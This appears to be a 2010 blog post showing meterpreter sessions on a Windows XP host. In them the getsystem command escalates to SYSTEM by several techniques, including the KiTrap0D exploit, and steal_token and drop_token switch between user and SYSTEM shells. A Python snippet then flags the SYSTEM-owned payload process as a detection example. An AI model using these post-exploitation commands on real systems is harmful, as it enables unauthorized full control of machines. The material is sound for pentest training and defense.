Friday, January 29, 2010

metasploit getsystem command

Shiny new hotness...

meterpreter > getuid
Server username: WINXPSP3\user
**user is an admin; if you are not admin you can only use -t 4, or -t 0, which iterates through all techniques**

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h   Help Banner.
    -t   The technique to use. (Default to '0').
           0 : All techniques available
           1 : Service - Named Pipe Impersonation (In Memory/Admin)
           2 : Service - Named Pipe Impersonation (Dropper/Admin)
           3 : Service - Token Duplication (In Memory/Admin)
           4 : Exploit - KiTrap0D (In Memory/User)


meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user

meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user

meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user

meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


Hey I want user back! (note: after technique 4, rev2self doesn't take you back to user)

meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


steal_token


meterpreter > steal_token -h

[-] Usage: steal_token [pid]


meterpreter > ps

Process list
============

 PID   Name              Arch  User                          Path
 ---   ----              ----  ----                          ----
 0     [System Process]
 4     System            x86   NT AUTHORITY\SYSTEM
 368   smss.exe          x86   NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 592   csrss.exe         x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 616   winlogon.exe      x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 660   services.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 672   lsass.exe         x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 832   svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 908   svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1000  svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1048  svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1088  svchost.exe       x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1440  spoolsv.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1560  explorer.exe      x86   WINXPSP3\user                 C:\WINDOWS\Explorer.EXE
 540   alg.exe           x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 980   wscntfy.exe       x86   WINXPSP3\user                 C:\WINDOWS\system32\wscntfy.exe
 1360  wuauclt.exe       x86   WINXPSP3\user                 C:\WINDOWS\system32\wuauclt.exe
 2004  svchost.exe       x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 2000  ctfmon.exe        x86   WINXPSP3\user                 C:\WINDOWS\system32\ctfmon.exe
 960   WINWORD.EXE       x86   WINXPSP3\user                 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
 664   WYvWeNeBQtYr.exe  x86   NT AUTHORITY\SYSTEM           C:\Documents and Settings\user\WYvWeNeBQtYr.exe


meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell      <-- now uses -t by default
Process 1272 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user

C:\Documents and Settings\user>


wait I want a SYSTEM shell again

meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>


or call execute without -t to use your process token

meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM

C:\Documents and Settings\user>
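From the defender's side, the process listing above already gives the game away: the meterpreter payload (PID 664) is a SYSTEM-owned process whose image sits in the user's profile directory. The following added example (my own code, not from the original post or from Metasploit) parses a `ps` listing in that layout and flags service-account processes running from outside the Windows and Program Files trees; the sample rows are constructed from the listing above, and the %SystemRoot% mapping is an assumption.

```python
import re

# Constructed sample in the layout of the meterpreter `ps` listing above:
# PID, Name, Arch, User, Path (Path absent for the idle and System processes).
SAMPLE_PS = r"""
 0     [System Process]
 4     System            x86   NT AUTHORITY\SYSTEM
 368   smss.exe          x86   NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 592   csrss.exe         x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 908   svchost.exe       x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1560  explorer.exe      x86   WINXPSP3\user                 C:\WINDOWS\Explorer.EXE
 960   WINWORD.EXE       x86   WINXPSP3\user                 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
 664   WYvWeNeBQtYr.exe  x86   NT AUTHORITY\SYSTEM           C:\Documents and Settings\user\WYvWeNeBQtYr.exe
"""

# User names contain spaces, so the user column is matched lazily and the
# path column is anchored on a drive letter or a leading backslash.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+(?P<user>.+?)"
    r"(?:\s+(?P<path>(?:[A-Za-z]:\\|\\).*))?\s*$"
)

SYSTEM_ROOT = "C:\\WINDOWS"  # assumption: %SystemRoot% of the XP host above
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                    "nt authority\\network service"}


def normalize_path(path):
    """Strip the NT object-manager prefix, expand SystemRoot, lower-case."""
    if path.startswith("\\??\\"):
        path = path[4:]
    if path.lower().startswith("\\systemroot\\"):
        path = SYSTEM_ROOT + path[len("\\systemroot"):]
    return path.lower()


def parse_ps(text):
    """One dict per process row; header and unparsable rows are skipped."""
    return [m.groupdict() for m in map(ROW.match, text.splitlines()) if m]


def suspicious_processes(text):
    """(pid, name, path) of service-account processes outside trusted trees."""
    hits = []
    for row in parse_ps(text):
        if row["user"].lower() not in SERVICE_ACCOUNTS or not row["path"]:
            continue
        if not normalize_path(row["path"]).startswith(TRUSTED_PREFIXES):
            hits.append((int(row["pid"]), row["name"], row["path"]))
    return hits
```

On the sample above this flags only PID 664; the same heuristic applied to live process data is one cheap check for a payload that has already gone SYSTEM.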



2 comments:

Stepan said...

How is it possible?

Is it publicly available?

CG said...

svn up!